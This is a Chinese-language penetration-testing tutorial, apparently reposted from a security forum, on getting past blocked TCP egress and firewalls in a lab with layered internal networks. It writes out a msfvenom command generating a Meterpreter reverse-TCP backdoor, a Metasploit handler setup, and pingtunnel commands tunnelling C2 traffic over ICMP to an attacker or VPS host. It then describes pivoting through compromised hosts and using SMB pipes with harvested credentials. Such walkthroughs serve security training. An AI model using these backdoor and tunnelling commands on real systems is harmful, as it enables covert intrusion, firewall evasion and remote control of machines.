朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦
原文链接:
https://xz.aliyun.com/t/13918
隧道技术是一种在网络中创建私密通道以在不安全或公共网络上安全传输数据的方法。它允许将一种网络协议的数据封装在另一种网络协议的数据包中传输。
代理和隧道技术都可以用于安全性和访问控制,但它们的主要区别在于其作用和实现方式。代理更多地用于代表客户端请求资源,而隧道技术用于在网络中创建安全通道传输数据。
今天列举的是tcp协议被封杀导致无法出网
首先生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=444 -f exe > msf.exe
然后msf启动监听,监听333端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server
windows开启隧道将本地444端口icmp协议数据转发到攻击机IP的333端口上
pingtunnel.exe -type client -l 127.0.0.1:444 -s 192.168.4.1(kali) -t 192.168.4.1:333 -tcp 1 -noprint 1 -nolog 1
然后使用icmp1生成后门程序
kali使用pingtunnel工具开启隧道服务:./pingtunnel -type server
windows开启隧道将本地5555端口icmp协议数据转发到攻击机IP的6666端口上
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.4.1(kali) -t vps地址:6666 -tcp 1 -noprint 1 -nolog 1
内网环境
第一步;先获取到web主机的权限(就是常规的web渗透拿到主机权限,这里就不演示了)
第二步:vps主机无法直接跟用户主机进行通讯,所以我们在win7上生成一个本地后门,然后通过web服务器进行上线
将2222的监听器生成后门程序,上传至用户主机执行
然后进web服务器会话交换,连接用户主机的2222端口
主机成功上线
同样要先拿到web服务器的权限,然后添加路由
生成后门,后门的连接地址0.0.0.0或127.0.0.1都行
将后门上传到用户主机执行
kali开启监听
成功上线
三层内网也是一样的 先添加路由
然后开启代理转发
设置代理
这就要先说下正向连接和反向连接了
知道了正向和反向连接我们开始绕过防火墙上线
windows_server2008和win7的上线就按上面说的方法正常上线就行,接下来上线win10
因为正向连接受到防火墙的限制,我们尝试反向连接,但是win10目前只有win7可以通信,所以我们用win7来转发上线
随后就会生成一个反向连接的监听器,将监听器上传到win10执行
执行后门,成功上线
接下来windows_server2016上线 因为win10做了入站规则,所以反向连接给win10,win10就会拒绝 直接选择正向硬刚防火墙正向规则,因为正向规则只允许访问打印机,也就是smb服务,文件共享协议 我们建立一个smb管道来进行上线
新建一个smb管道
使用可通信主机进行端口扫描
找到扫描出来的主机
账号密码都是前期收集到的信息。注:==没有账号密码无法利用==
监听器选择刚生成的smb管道,会话选择win10(能通信的网段主机)的
成功上线